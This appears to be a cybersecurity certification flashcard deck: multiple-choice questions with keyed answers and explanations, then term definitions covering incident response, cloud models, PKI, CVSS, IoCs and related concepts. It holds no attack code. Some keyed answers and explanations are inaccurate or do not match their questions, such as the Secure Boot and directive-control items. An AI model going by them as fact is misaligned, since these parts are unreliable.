B. The role of the legal department is to perform the following: Review nondisclosure agreements (NDAs) to ensure support for incident response efforts. Develop wording of documents used to contact possibly affected sites and organizations. Assess site liability for illegal computer activity.
Which of the following processes involves limiting the scope of an incident by leveraging existing segments of the network as barriers to prevent the spread to other segments? 1. Isolation 2. Segmentation 3. Containerization 4. Partitioning
B. The segmentation process involves limiting the scope of an incident by leveraging existing segments of the network as barriers to prevent the spread to other segments. These segments could be defined at either Layer 3 or Layer 2 of the OSI reference model.
Which of the following is the first step in the SDLC? 1. Design 2. Plan/initiate project 3. Release/maintain 4. Develop
B. The software development life cycle steps are as follows: Step 1. Plan/initiate project Step 2. Gather requirements Step 3. Design Step 4. Develop Step 5. Test/validate Step 6. Release/maintain Step 7. Certify/accredit Step 8. Change management and configuration management/replacement
Which of the following is the key purpose of a honeypot? 1. Loss minimization 2. Information Gathering 3. Confusion 4. Retaliation
B. The ultimate purpose of honeypot systems is to divert attention from more valuable resources and to gather as much information about an attack or attacker as possible.
Which of the following is a good solution when disparate applications that use heir own authorization logic are in use in the enterprise: 1. XML 2. XACML 3. PDP 4. PEP
B. To address XML-based attacks, consider eXtensible Access Control Markup Language (XACML), which is a standard for an access control policy language using XML. Its goal is to create an attribute-based access control (ABAC) system that decouples the access decision from the application or the local machine.
Which of the following is not one of the three main actors in traditional DevOps? 1. Operations 2. Security 3. QA 4. Production
B. Traditionally, three main actors in the software development process—development (Dev), quality assurance (QA), and operations (Ops)—performed their functions separately, or operated in "silos." In DevOps they work together on all steps of the process.
Which of the following is a specification first used in late 2001 that allows USB devices, such as tablets and smartphones to act as either a USB host or a USB device: 1. USB pass-through 2. USB-OTG 3. Ready Boost 4. Lo Jack
B. USB On-The-Go (USB OTG) is a specification first used in late 2001 that allows USB devices, such as tablets and smartphones, to act as either a USB host or a USB device. With respect to smartphones, USB OTG has been used to hack around an iPhone security feature that requires a valid iPhone username and password to use a device after a factory reset.
Which of the following cloud service models is typically used as software development environment: 1. SaaS 2. PaaS 3. IaaS 4. FaaS
B. With Platform as a Service (PaaS), the vendor provides the hardware platform or data center and the software running on the platform, including the operating systems and infrastructure software. The company is still involved in managing the system. An example of this is a company that contacts a third party to provide a development platform for internal developers to use for development and testing.
Which of the following is lost with improper auditing? (Choose the best answer.) 1. Cryptographic Security 2. Accountability 3. Data Security 4. Visibility
B. Without proper auditing, you have no accountability.
Which of the following utilities is a freeware task manager that offers more functionality than Windows Task Manager? 1. System Information 2. Process Explorer 3. Control Panel 4. Performance
B. You can sometimes locate processes that are using either CPU or memory by using Task Manager, but again, many malware programs don't show up in Task Manager. Either Process Explorer or some other tool may give better results than Task Manager.
To use the BACnet protocol in an IP world, __________________ was developed.
BACnet/IP (B/IP). The BACnet standard makes exclusive use of MAC addresses for all data links, including Ethernet. To support IP, IP addresses are needed, which is why B/IP was developed.
The _________________CVSS metric group describes characteristics of a vulnerability that are constant over time and user environments.
Base
__________________ refers to traffic that leaves a network at regular intervals.
Beaconing. This type of traffic could be generated by compromised hosts that are attempting to communicate with (or call home) the malicious party that compromised the host.
What type of threat data describes a source that repeatedly sends large amounts of traffic to a single IP address
Behavioral. Some threat intelligence data is based not on reputation but on the behavior of the traffic in question. Behavioral analysis is another term for anomaly analysis.
________________ is a term for sets of data so large or complex that they cannot be analyzed by using traditional data processing applications.
Big data. Big data is a term for sets of data so large or complex that they cannot be analyzed by using traditional data processing applications. Specialized applications have been designed to help organizations with their big data. The big data challenges that may be encountered include data analysis, data capture, data search, data sharing, data storage, and data privacy.
Reaver
Both a package of tools called Reaver and a tool within the package called Reaver that is used to attack Wi-Fi Protected Setup (WPS)
The vulnerability analysis and risk assessment may be performed by the __________________ or by a separately appointed risk assessment team.
Business Continuity Planning (BCP) committee. The BIA relies heavily on any vulnerability analysis and risk assessment that is completed.
Which of the following terms refers to any device exposed directly to the Internet or to any untrusted networks? 1. Screened subnet 2. Three-legged Firewall 3. Bastion Host 4. Screened Host
C. A bastion host may or may not be a firewall. The term actually refers to the position of any device. If the device is exposed directly to the Internet or to any untrusted network while screening the rest of the network from exposure, it is a bastion host.
Which of the following requires the most effort to maintain? 1. Whitelist 2. Access list 3. Blacklist 4. Graylist
C. A blacklist constitutes the file types that are denied, so you must constantly update this with new malicious file types.
Which of the following has taken place when a pointer with a value of NULL is used as though it pointed to a valid memory area? 1. Insecure Object Reference 2. Improper Error Handling 3. Dereferencing 4. Advanced Persistent Threats
C. A null-pointer dereference takes place when a pointer with a value of NULL is used as though it pointed to a valid memory area. If an attacker can intentionally trigger a null-pointer dereference, the attacker might be able to use the resulting exception to bypass security logic or to cause the application to reveal debugging information.
VxWorks 6.5 is an example of a(n) _____________ system: 1. Modbus 2. Embedded 3. RTOS 4. Legacy
C. A real-time operating system (RTOS) is designed to process data as it comes in, typically without buffer delays. Traditionally, security hasn't been a top concern in the design of RTOSs and, consequently, some vulnerabilities have surfaced. For example, VxWorks 6.5 and later versions have found to be susceptible to a vulnerability that allows remote attackers full control over targeted devices.
Which of the following discusses implementing endpoint protection platforms (EPPs)? 1. IEC 270017 2. FIPS 120 3. NIST SP 800-128 4. PCI DSS
C. According to NIST SP 800-128, endpoints (for example, laptops, desktops, mobile devices) are a fundamental part of any organizational system. Endpoints are an important source of connecting end users to networks and systems, and are also a major source of vulnerabilities and a frequent target of attackers looking to penetrate a network.
Which of the following relates to logon and information security continuous monitoring? 1. IEEE 802.ac 2. IOC/IEC 27017 3. NIST SP 800-137 4. FIPS
C. According to NIST SP 800-137, information security continuous monitoring (ISCM) is defined as maintaining ongoing awareness of information security, vulnerabilities, and threats to support organizational risk management decisions.
Which of the following is used to provide integration between your website and a payment gateway? 1. Perl 2. Orchestration 3. API 4. Scripting
C. An API is a set of clearly defined methods of communication between various software components. As such, you should think of an API as a connection point that requires security consideration; for example, between your e-commerce site and a payment gateway.
Which of the following describes a piece of software that is built into a larger piece of software and is in charge of performing some specific function on behalf of the larger system: 1. Proprietary 2. Legacy 3. Embedded 4. Linked
C. An embedded system is a piece of software that is built into a larger piece of software and is in charge of performing some specific function on behalf of the larger system. The embedded part of the solution might address specific hardware communications and might require drivers to talk between the larger system and some specific hardware.
Which of the following PKI components verifies the requestor's identity and registers the requestor? 1. TA 2. CA 3. RA 4. BA
C. Any participant that requests a certificate must first go through the registration authority (RA), which verifies the requestor's identity and registers the requestor. After the identity is verified, the RA passes the request to the certificate authority (CA).
Which of the following might be an indication of a backdoor? 1. Introduction of new accounts 2. Unexpected output 3. Unexpected outbound communication 4. Anomalous activity
C. Any unexpected outbound traffic should be investigated, regardless of whether it was discovered as a result of network monitoring or as a result of monitoring the host or application. With regard to the application, it can mean that data is being transmitted back to the malicious individual.
Which of the following is any piece of data that can be used alone or with other information to identify a single person? 1. Intellectual property 2. Trade secret 3. PII 4. PPP
C. As part of the security measures that organizations must take to protect privacy, personally identifiable information (PII) must be understood, identified, and protected. PII is any piece of data that can be used alone or with other information to identify a single person.
Which of the following is an additional method of identifying malware? 1. DHCP snooping 2. DAI 3. Automated malware signature creation 4. Piping
C. Automated malware signature creation is an additional method of identifying malware. The antivirus software monitors incoming unknown files for the presence of malware and analyzes each file based on both classifiers of file behavior and classifiers of file content.
Which of the following is a data acquisition tool for smartphones? 1. MD5 2. EnCase 3. Cellebrite 4. dd
C. Cellebrite has found a niche by focusing on collecting evidence from smartphones.
Which of the following is a data acquisition tool? 1. MD5 2. EnCase 3. Cellebrite 4. dd
C. Cellebrite has found a niche by focusing on collecting evidence from smartphones.
Which of the following authentication factors represents something a person is? 1. Knowledge Factor 2. Ownership Factor 3. Characteristic Factor 4. Location Factor
C. Characteristic factor authentication is authentication that is provided based on something a person is. This type of authentication is referred to as a Type III authentication factor. Biometric technology is the technology that allows users to be authenticated based on physiological or behavioral characteristics.
Which of the following is considered the next generation of DevOps and attempts to make sure that software developers can release new product changes to customers quickly in a sustainable way? 1. Agile 2. DevSecOps 3. Continuous deployment/delivery 4. Scrum
C. Continuous deployment/delivery takes continuous integration one step further, with every change that passes all stages of your production pipeline being released to your customers. This helps to improve the feedback loop.
Which of the following controls is a directive control? 1. A new firewall 2. A policy forbidding USB drives 3. A No Admittance sign at the server room door 4. A biometric authentication system
C. Directive controls specify acceptable practices within an organization. They are in place to formalize an organization's security directive mainly to its employees. The most popular directive control is an acceptable use policy (AUP), which lists proper (and often examples of improper) procedures and behaviors that personnel must follow.
Which of the following is done to prevent the inclusion of dangerous character types that might be inserted by malicious individuals? 1. Input validation 2. Blacklisting 3. Output encoding 4. Fuzzing
C. Encoding is the process of changing data into another form using code. When this process is applied to output, it is done to prevent the inclusion of dangerous character types that might be inserted by malicious individuals.
Which of the following shifts security from a reactive threat approach to one that can detect and prevent threats before they reach the organization? 1. NAC 2. DAC 3. EDR 4. DLP
C. Endpoint detection and response is a proactive endpoint security approach designed to supplement existing defenses.
Your team has identified that a recent breach was sourced by a disgruntled employee. What part of threat modeling is being performed by such identification? 1. Total Attack Surface 2. Impact 3. Adversary Capability 4. Attack Vector
C. First, you must have a grasp of the capabilities of the attacker or adversary. Threat actors have widely varying capabilities. When carrying out threat modeling, you may decide to develop a more comprehensive list of threat actors to help in scenario development
Which of the following threat actors uses attacks as a means to get their message out and affect the businesses that they feel are detrimental to their cause: 1. Organized crime 2. Terrorist group 3. Hacktivist 4. Insider threat
C. Hacktivists are activists for a cause, such as animal rights, that use hacking as a means to get their message out and affect the businesses that they feel are detrimental to their cause.
In which step of Deming's Plan-Do-Check-Act cycle are the results of the implementation analyzed to determine whether it made a difference? 1. Plan 2. Do 3. Check 4. Act
C. Implementation results are analyzed to determine if the implementation made a difference in Step 3, Check. Deming's Plan-Do-Check-Act cycle steps are as follows: Plan: Identify an area for improvement and make a formal plan to implement it. Do: Implement the plan on a small scale. Check: Analyze the results of the implementation to determine whether it made a difference. Act: If the implementation made a positive change, implement it on a wider scale. Continuously analyze the results.
Which type of SIEM rule is typically used in worm/malware outbreak scenarios? 1. Cause and effect 2. Trending 3. Transitive or tracking 4. Single event
C. In a transitive or tracking rule, the target in the first event (N malware infection) becomes the source in the second event (malware infection of another machine). This is typically used in worm/malware outbreak scenarios.
Which of the following often requires that organizations maintain archived data for longer periods? 1. Chain of custody 2. Lawful intercept 3. Legal hold 4. Discovery
C. Legal holds often require that organizations maintain archived data for longer periods. Data on a legal hold must be properly identified, and the appropriate security controls should be put into place to ensure that the data cannot be tampered with or deleted.
Which of the following is a knowledge base of adversary tactics and techniques based on real-world observations: 1. Diamond Model 2. OWASP 3. MITRE ATT&CK 4. STIX
C. MITRE ATT&CK is a knowledge base of adversary tactics and techniques based on real-world observations. It is an open system, and attack matrices based on it have been created for various industries. It is designed as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community.
Which of the following is the average time required to repair a single resource or function? 1. RPO 2. MTD 3. MTTR 4. RTO
C. Mean time to repair (MTTR) is the average time required to repair a single resource or function when a disaster or disruption occurs.
Which of the following is software designed to exert a measure of control over mobile devices? 1. IoT 2. BYOD 3. MDM 4. COPE
C. Most mobile device management (MDM) software can create an encrypted "container" to hold and quarantine corporate data separately from that of the users' data. This allows for MDM policies to be applied only to that container and not to the rest of the device.
Which of the following is the process of discovering and listing information? 1. Escalation 2. Discovery 3. Enumeration 4. Penetration
C. Network enumeration is the process of discovering and listing pieces of information that might be helpful in a network attack or compromise.
Which of the following is an example of a right and not a permission? 1. Read access to a file 2. Ability to delete a file 3. Ability to reset passwords 4. Ability to change the permissions of a file
C. Rights allow administrators to assign specific privileges and logon rights to groups or users. Rights manage who is allowed to perform certain operations on an entire computer or within a domain, rather than a particular object within a computer.
Which of the following is an example of a SoC that manages all the radio functions in a network interface: 1. Dual-core processor 2. Broadband processor 3. Baseband processor 4. Hyper-processor
C. Systems-on-a Chip (SoCs) have become typical inside cell phone electronics for their reduced energy use. An example is a baseband processor. This is a chip in a network interface that manages all the radio functions. A baseband processor typically uses its own RAM and firmware.
Which of the following groups should receive technical training on configuring and maintaining security controls? 1. High-level management 2. Middle management 3. Technical staff 4. Employees
C. Technical staff should receive technical training on configuring and maintaining security controls, including how to recognize an attack when it occurs. In addition, technical staff should be encouraged to pursue industry certifications and higher education degrees.
Which of the following focuses on merging cybersecurity and physical security to aid governments in dealing with emerging threats? 1. OWASP 2. NIST 3. IIC 4. PDA
C. The Integrated Intelligence Center (IIC) is a unit at the Center for Internet Security (CIS) that focuses on merging cybersecurity and physical security to aid governments in dealing with emerging threats. IIC attempts to create predictive models using the multiple data sources at its disposal.
Which of the following is a standard that the security automation community uses to enumerate software flaws and configuration issues? 1. NAC 2. DAC 3. SCAP 4. DLP
C. The Security Content Automation Protocol (SCAP) standardizes the nomenclature and formats used. A vendor of a security automation product can obtain a validation against SCAP, demonstrating that its product will interoperate with other scanners and express the scan results in a standardized way.
Which of the following is the first document that should be drafted after recovery from an incident? 1. Incident summary report 2. Incident response plan 3. Lessons learned report 4. IoC document
C. The first document that should be drafted is a lessons learned report. It briefly lists and discusses what was learned about how and why the incident occurred and how to prevent it from occurring again.
Which of the following is not one of the four interrelated domains of the Open Group Architecture Framework (TOGAF) four interrelated domains? 1. Business architecture 2. Data architecture 3. Security architecture 4. Technology architecture
C. The four domains are -Business architecture: Business strategy, governance, organization, and key business processes -Application architecture: Individual systems to be deployed, interactions between the application systems, and their relationships to the core business processes -Data architecture: Structure of an organization's logical and physical data assets -Technology architecture: Hardware, software, and network infrastructure
Which of the following is the first step in the BIA? 1. Identify resource requirements. 2. Identify outage impacts and estimate downtime. 3. Identify critical processes and resources. 4. Identify recovery priorities.
C. The four main steps of the business impact analysis (BIA) are as follows: -Identify critical processes and resources. -Identify outage impacts and estimate downtime. -Identify resource requirements. -Identify recovery priorities.
The non-technical leadership audience needs which of the following to be stressed in the communication of risk factors to stakeholders? 1. The technical risks 2. Security operations difficulties 3. The cost of cybersecurity expenditures 4. Translation of technical risk into common business terms
C. The non-technical leadership audience needs the message to be put in context with their responsibilities. This audience needs the cost of cybersecurity expenditures to be tied to business performance.
Which of the following helps to identify the number and type of resources that should be devoted to a security issue? 1. Specific threats that are applicable to the component 2. Mitigation strategies that could be used 3. The relative value of the information that could be discovered 4. The organizational culture
C. The relative value of the information that could be discovered through the compromise of the components under assessment helps to identify the number and type of resources that should be devoted to the issue.
Which of the following is the first step in the incident response process? 1. Containment 2. Eradication and recovery 3. Preparation 4. Detection
C. The steps in the incident response process are as follows: -Preparation -Detection -Analysis -Containment -Eradication and recovery -Post-incident activities
Which step is the software development life cycle (SDLC) follows the design step? 1. Gather requirements 2. Certify/accredit 3. Develop 4. Test/validate
C. The steps in the software development life cycle (SDLC) are Step 1. Plan/initiate project Step 2. Gather requirements Step 3. Design Step 4. Develop Step 5. Test/validate Step 6. Release/maintain Step 7. Certify/accredit Step 8. Perform change management and configuration management/replacement
Which of the following is designed as a replacement for the traditional PC BIOS? 1. TPM 2. Secure boot 3. UEFI 4. NX bit
C. The traditional BIOS has been replaced with the Unified Extensible Firmware Interface (UEFI). UEFI maintains support for legacy BIOS devices but is considered a more advanced interface than the traditional BIOS.
Which operational control type would include security guards? 1. Detective 2. Preventative 3. Deterrent 4. Directive
C. Unlike preventative controls, deterrent controls are designed to discourage but not necessarily prevent malicious activity.
Which of the following IoCs is most likely from a DoS attack? 1. Beaconing 2. Irregular peer-to-peer communication 3. Bandwidth consumption 4. Rogue device on the network
C. Whenever bandwidth usage is above normal and there is no known legitimate activity generating the traffic, you should suspect security issues that generate unusual amounts of traffic, such as denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks.
Which of the following is a network logically separate from the other networks where resources that will be accessed from the outside world are made available to only those that are authenticated? 1. Intranet 2. DMZ 3. Extranet 4. Internet
C. While systems in the DMZ typically require no authentication, the resources in the extranet do.
Which of the following is a series of two doors with a small room between them: 1. Turnstile 2. Bollard 3. Mantrap 4. Moat
C. With a mantrap, the user is authenticated at the first door and then allowed into the room. At that point, additional verification occurs (such as a guard visually identifying the person), and then the person is allowed through the second door.
The Aviation Government Coordinating Council is chartered by which organization?
CISA. The Cybersecurity and Infrastructure Security Agency (CISA) maintains a number of chartered organizations, among them the Aviation Government Coordinating Council.
Define Attack Vector
CVSS base metric that describes how the attacker would exploit the vulnerability
Define Attack Complexity
CVSS base metric that describes the difficulty of exploiting the vulnerability
Define Availability
CVSS base metric that describes the disruption that might occur if the vulnerability is exploited
Define Confidentiality (C)
CVSS base metric that describes the information disclosure that may occur if the vulnerability is exploited
Define Integrity (I)
CVSS base metric that describes the type of data alteration that might occur
Define Machine Learning
Capability of software to gather information and make conclusions
Define Blocks Cipher
Cipher that performs encryption by breaking the message into fixed length units
Platform as a Service (PaaS)
Cloud service model in which the vendor provides the hardware platform or data center and the software running on the platform, including the operating systems and infrastructure software
Define Infrastructure as a Service (IaaS)
Cloud service model in which the vendor provides the hardware platform or data center, and the company installs and manages its own operating systems and application systems.
static code analysis
Code analysis that is conducted without the code executing
wireless key logger
Collects information and transmits it to the criminal via Bluetooth or Wi-Fi.
When you are encrypting sensitive data, you are implementing a(n) _____________
Compensating control. A compensating control, also known as a countermeasure or safeguard, reduces the potential risk.
total attack surface
Comprises all of the points at which vulnerabilities exist. It is critical that the organization have a clear understanding of the total attack surface.
Define employee privacy issues and expectation of privacy
Concept that organizations must give employees the proper notice of any monitoring that might be used
______________________ are security settings that are required on devices of various types
Configuration baselines. A baseline is a floor or minimum standard that is required. With respect to configuration baselines, they are security settings that are required on devices of various types. These settings should be driven by results of vulnerability and risk management processes.
Define NIST SP 800-57 rev. 5
Contains recommendations for key management and is published in three parts
_________________________ is a software development practice whereby the work of multiple individuals is combined a number of times a day.
Continuous integration. The idea behind this is to identify bugs as early as possible in the development process.
Victim
Corner of the Diamond Model that describes a single victim or multiple victims.
Define Capability
Corner of the Diamond Model that describes the attacker intrusion tools and techniques
Define Adversary
Corner of the Diamond Model that describes the intent of the attacker
Infrastructure
Corner of the Diamond Model that describes the set of systems an attacker uses to launch attacks
____________________ is a strategy in which an organization purchases mobile devices for users and users manage those devices.
Corporate-owned, personally enabled (COPE). COPE is a strategy in which an organization purchases mobile devices and users manage those devices. By using a COPE strategy, organizations can often monitor and control the users' activity to a larger degree than with personally owned devices.
Define imaging
Create a bit-level image of the disk
Define Key Stretching
Cryptographic technique that involves making a weak key stronger by increasing the time it takes to test each possible key
Which of the following policies is intended to demonstrate a commitment to ethics? 1. Non-compete 2. Non-disclosure 3. Expectation of privacy 4. Code of conduct
D. A code of conduct policy is one intended to demonstrate a commitment to ethics in the activities of the principles. It is typically a broad statement of commitment that is supported by detailed procedures designed to prevent unethical activities.
In which cloud deployment model does an organization provide and manage some resources in-house and has other resources provided externally via a public cloud: 1. Private 2. Public 3. Community 4. Hybrid
D. A hybrid cloud is a cloud computing model in which an organization provides and manages some resources in-house and has others provided externally via a public cloud. This model requires a relationship with the service provider as well as an in-house cloud deployment specialist.
Which of the following is not an application-related IoC? 1. Introduction of new accounts 2. Unexpected output 3. Unexpected outbound communication 4. Beaconing
D. Beaconing is a network-related IoC.
Which of the following is not intellectual property? 1. Patent 2. Trade secret 3. Trademark 4. Contract
D. Contracts are not considered intellectual property because they are not unique creations of the mind.
When you receive bulk e-mail from a vendor and it refers to you by first name, what technique is in use? 1. Scripting 2. Orchestration 3. Heuristics 4. Data enrichment
D. Data enrichment is a technique that allows one process to gather information from another process or source and then customize a response to a third process using the data from the second process or source.
Which of the following types of file carving is not supported by Forensic Explorer? 1. Cluster-based file carving 2. Sector-based file carving 3. Byte-based file carving 4. Partition-based file carving
D. Forensic Explorer is a data carving tool that searches for signatures. It offers carving support for more than 300 file types. It supports Cluster-based file carving Sector-based file carving Byte-based file carving
Which of the following metrics cannot be found in Windows Task Manager? 1. Memory consumption 2. Drive capacity consumption 3. Processor consumption 4. Unauthorized software
D. Locating unauthorized software cannot be done by using Task Manager
Windows Secure Boot is an example of what technology? 1. Security extensions 2. Secure enclave 3. UEFI 4. Measured boot
D. Measured Boot, also known as Secure Boot, is a term that applies to several technologies that follow the Secure Boot standard. Its implementations include Windows Secure Boot, measured launch, and Integrity Measurement Architecture (IMA).
Which of the following is not one of the classes of controls described by NIST SP 800-53 Rev 4? 1. Access Control 2. Awareness and Training 3. Contingency Planning 4. Facility Security
D. NIST SP 800-53 Rev 4 is a security controls development framework developed by the NIST body of the U.S. Department of Commerce.
Which of the following is a password cracking tool? 1. Wireshark 2. FTK 3. Helix 4. Cain and Abel
D. One of the most well-known password cracking programs is Cain and Abel. It can recover passwords by sniffing the network; crack encrypted passwords using dictionary, brute-force, and cryptanalysis attacks; record VoIP conversations; decode scrambled passwords; reveal password boxes; uncover cached passwords; and analyze routing protocols.
Which of the following is an example of closed-source intelligence: 1. Internet blogs and discussion groups 2. Print and online media 3. Unclassified government data 4. Platforms maintained by private organizations
D. Proprietary/closed-source intelligence sources are those that are not publicly available and usually require a fee to access. Examples of this are platforms maintained by private organizations that supply constantly updating intelligence information. In many cases this data is developed from all of the provider's customers and other sources.
Which of the following is responsible for developing all written responses to the outside world concerning an incident and its response? 1. Human resources 2. Legal 3. Management 4. Public relations
D. Public relations (PR) roles include the following: Handling all press conferences that may be held Developing all written responses to the outside world concerning an incident and its response
Which of the following is the strongest hashing utility? 1. MD5 2. MD6 3. SHA-1 4. SHA-3
D. SHA-3, the latest version, is actually a family of hash functions, each of which provides different functional limits.
Which of the following refers to removing all traces of a threat by overwriting the drive multiple times to ensure that the threat is removed? 1. Destruction 2. Clearing 3. Purging 4. Sanitization
D. Sanitization refers to removing all traces of a threat by overwriting the drive multiple times to ensure that the threat is removed. This works well for mechanical hard disk drives, but solid-state drives present a challenge in that they cannot be overwritten.
Which of the following is used to look within a log file or data stream and locate any instances of a combination of characters? 1. Script 2. Pipe 3. Transitive search 4. String search
D. String searches are used to look within a log file or data stream and locate any instances of that string. A string can be any combination of letters, numbers, and other characters.
Which of the following affects all healthcare facilities, health insurance companies, and healthcare clearinghouses? 1. GLBA 2. PCI DSS 3. SOX 4. HIPAA
D. The Health Insurance Portability and Accountability Act (HIPAA), also known as the Kennedy-Kassebaum Act, affects all healthcare facilities, health insurance companies, and healthcare clearinghouses. It is enforced by the Office of Civil Rights (OCR) of the Department of Health and Human Services (HHS).
Which of the following ensures that systems have access to leading-edge integrated circuits from secure, domestic sources? 1. DoD 2. FIPS 120 3. OWASP 4. Trusted Foundry
D. The Trusted Foundry program can help you exercise care in ensuring the authenticity and integrity of the components of hardware purchased from a vendor. This DoD program identifies "trusted vendors" and ensures a "trusted supply chain."
Which of the following is false with respect to using forensic tools for the virtual environment? 1. The same tools can be used as in a physical environment. 2. Knowledge of the files that make up a VM is critical. 3. Requires deep knowledge of the log files created by the various components. 4. Requires access to the hypervisor code.
D. Using forensic tools for the virtual environment does not require access to the hypervisor code. In fact, you will not have access to that code as you are a licensed user and not the owner of the code.
Which of the following is not a risk associated with scanning activities? 1. False sense of security can be introduces 2. Does not itself reduce your risk 3. Only as valid as the latest scanner update 4. Distracts from day-to-day operations
D. While running a scan does distract from day-to-day operations, it is not considered to be a risk. Failure to scan actually increases risk.
Which of the following is a free online service for testing and analyzing URLs, helping with identification of malicious content on websites? 1. URLVoid 2. URLSec 3. SOA 4. urlQuery
D. urlQuery is a free online service for testing and analyzing URLs, helping with identification of malicious content on websites.
_________________ means altering data from its original state to protect it.
Data masking means altering data from its original state to protect it. Two forms of masking are encryption and hashing.
Define EU Electronic Security Directive
Defines electronic signature principles
Risk Mitigation
Defining the acceptable risk level the organization can tolerate and reducing the risk to that level
Define Controller Area Network (CAN bus)
Designed to allow vehicle microcontrollers and devices to communicate with each other's applications without a host computer
Define Anti-Tamper Technology
Designed to prevent access to sensitive information and encryption keys on a device
Define Incident Command System (ICS)
Designed to provide a way to enable effective and efficient domestic incident management by integrating a combination of facilities, equipment, personnel, procedures, and communications operating within a common organizational structure.
Define Code of Conduct / Ethics
Details standards of business conduct
Define executable process analysis
Determines what process is using/taxing the CPU
Define Bastion Host
Device exposed directly to the Internet or any untrusted network while screening the rest of the network from exposure
Define Firewall
Device or software whose purpose is to inspect and control the type of traffic allow
Rogue Access Point
Device present in the environment that you do not control
Rogue Device
Device present in the environment that you do not control
Define memorandum of understanding (MOU)
Document that, while not legally binding, indicates a general agreement between the principals to do something together
______________________ enables you to verify the source of an e-mail.
DomainKeys Identified Mail (DKIM). DKIM provides a method for validating a domain name identity that is associated with a message through cryptographic authentication.
self-encrypting drives
Drives that automatically encrypt the contents without user intervention.
Define emanations
Electromagnetic signals that are emitted by an electron device
Define credential stuffing
Entering a large number of spilled credentials automatically into websites until they are potentially matched to an existing account, which the attacker can then hijack for his or her own purposes
Define Certification
Evaluation of the technical system components
Give at least two examples of an IoC
Examples include the following: -Virus signatures -Known malicious file types -Domain names of known botnet servers
____________________ allows you to determine when a CPU is struggling with malware.
Executable process analysis. When the processor is very busy with very little or nothing running to generate the activity, it could be a sign that the processor is working on behalf of malicious software. Executable process analysis allows you to determine this.
Define Carving
Forensic technique used to identify a file when only fragments of data are available and no file system metadata is available
Define Change Management
Formal process for managing change
Define Attack Frameworks
Frameworks and methodologies that include security program development standards, enterprise and security architect development frameworks, security control development methods, corporate governance methods, and process management methods.
Define embedded
Functionality that is integrated into a program or a device
_________________ is the application of geographic limits to where a device can be used.
Geofencing. Geofencing depends on the use of Global Positioning System (GPS) or radio frequency identification (RFID) technology to create a virtual geographic boundary.
What process enabled the enemy to pinpoint the location of four U.S. Army Apache helicopters on the ground and destroy them?
Geotagging. Geotagging is the process of adding geographical identification metadata to various media and is enabled by default on many smartphones (to the surprise of some users). In many cases, this location information can be used to locate where images, videos, websites, and SMS messages
____________ are hacking for a cause, such as for animal rights, and use hacking as a means to get their message out and affect the businesses that they feel are detrimental to their cause
Hacktivists. are activists for a cause, such as animal rights, that use hacking as a means to get their message out and affect the businesses that they feel are detrimental to their causes.
Password Life
How long a password will be valid
Define Authentication Period
How long a user can remained logged in
Password history
How long before a password can be reused
Password Length
How long the password must be
Password Complexity
How the password will be structured
Define Encapsulating Security Payload (ESP)
IPsec component that provides all that AH does as well as data confidentiality
Define Authentication Header
IPsec component that provides data integrity, data origin authentication, and protection from replay attacks.
U.S. Digital Millennium Copyright Act
Imposes criminal penalties on those who make available technologies whose primary purpose is to circumvent content protection technologies.
supplicant
In 802.1X, the user or device requesting access to the network.
Define Authentication Server
In the 802.1X framework, the centralized device that performs authentication
Define Authenticator
In the 802.1X framework, the device through which the supplicant is attempting to access the network
Define Confidence Level
In the context of intelligence sources, a description of the perceived integrity of any particular data.
Session Hijacking
In this attack the hacker attempts to place themselves in the middle of an active conversation between two computers, with the goal of taking over the role of one of the two computers to receive all the data sent to that computer. The attacker hits one of the computers with a DoS attack while spoofing their IP to replace the original target.
Double Tagging
In this attack, the hacker creates a packet with two tags. When the first tag is stripped by the trunk port, the second tag remains intact, which allows the frame to hop to another VLAN.
______________ is any activity, artifact, or log entry that is typically associated with an attack of some sort
Indicator of compromise (IoC). An IoC is any activity, artifact, or log entry that is typically associated with an attack of some sort.
______________________ are behaviors and activities that precede or accompany a security incident.
Indicators of compromise (IoCs). You should always record or generate the IoCs that you find related to the incident. This information may be used to detect the same sort of incident later, before it advances to the point of a breach.
Remote Terminal Units (RTUs)
Industrial control system (ICS) components that connect to the sensors and convert sensor data to digital data, including telemetry hardware
Programmable Logic Controllers (PLCs)
Industrial control system (ICS) components that connect to the sensors and convert sensor data to digital data; they do not include telemetry hardware
Define fuzzing
Injecting invalid or unexpected input (sometimes called faults) into an application to test how the application reacts.
Which threat actor has already performed network penetration?
Insider. Insiders who are already inside the network perimeter and already know the network are a critical danger.
Remote Wipe
Instructions sent remotely to a mobile device that erase all the data, typically used when a device is lost or stolen
_____________ occurs when math operations try to create a numeric value that is too large for the available space.
Integer overflow. Integer overflow occurs when math operations try to create a numeric value that is too large for the available space. The register width of a processor determines the range of values that can be represented
_____________ creates a list of components and anchors the list to the TPM chip. It can use the list to attest to the system's runtime integrity.
Integrity Measurement Architecture (IMA). Anchoring the list to the TPM chip in hardware prevents its compromise.
List the Intel example of the implementation of processor security extensions.
Intel Software Guard Extensions (SGX). It defines private regions of memory, called enclaves, whose contents are protected and unable to be either read or saved by any process outside the enclave itself, including processes running at higher privilege levels
trademark
Intellectual property protection that ensures that a symbol, a sound, or an expression that identifies a product or an organization is protected from being used by another organization.
trade secret
Intellectual property protection that ensures that proprietary technical or business information remains confidential. A trade secret gives an organization a competitive edge. Trade secrets include recipes, formulas, ingredient listings, and so on.
Define Open-source intelligence
Intelligence sources that are available to all
Proprietary/closed-source intelligence
Intelligence sources that are available to only select an audience
Man-in-the-middle-attack
Intercepts legitimate traffic between two entities. The attacker can then control information flow and eliminate or alter communication between the two parties.
Define contamination
Intermingling or mixing of data of one sensitivity or need-to-know level with that of another
Define Basel II
International accord that addresses minimum capital requirements, supervisory review, and market discipline of financial institutions
____________________________ handles the creation of a security association for the session and the exchange of keys in IPsec.
Internet Security Association and Key Management Protocol (ISAKMP). ISAKMP creates a security association (SA) for each connection, enabling multiple IPsec connections at a time.
APIs are used in the ___________________ so that devices can speak to each other without users even knowing the APIs are there.
Internet of Things (IoT). APIs are used in the IoT so that devices can speak to each other without users even knowing they are there. APIs are used to control and monitor things we use every day, including fitness bands, home thermostats, lighting, and automobiles.
Diamond Model of Intrusion Analysis
Intrusion analysis model that emphasizes the relationships and characteristics of four basic components: the adversary, capabilities, infrastructure, and victims.
Define Digital Watermarking
Involves embedding a logo or trademark in documents, pictures, or other objects
segmentation
Involves limiting the scope of an incident by leveraging existing segments of the network as barriers to prevent the spread to other segments.
___________________ refers to a system of interrelated computing devices, mechanical and digital machines, and objects that are provided with unique identifiers and the ability to transfer data over a network without requiring human-to-human or human-to-computer interaction.
IoT
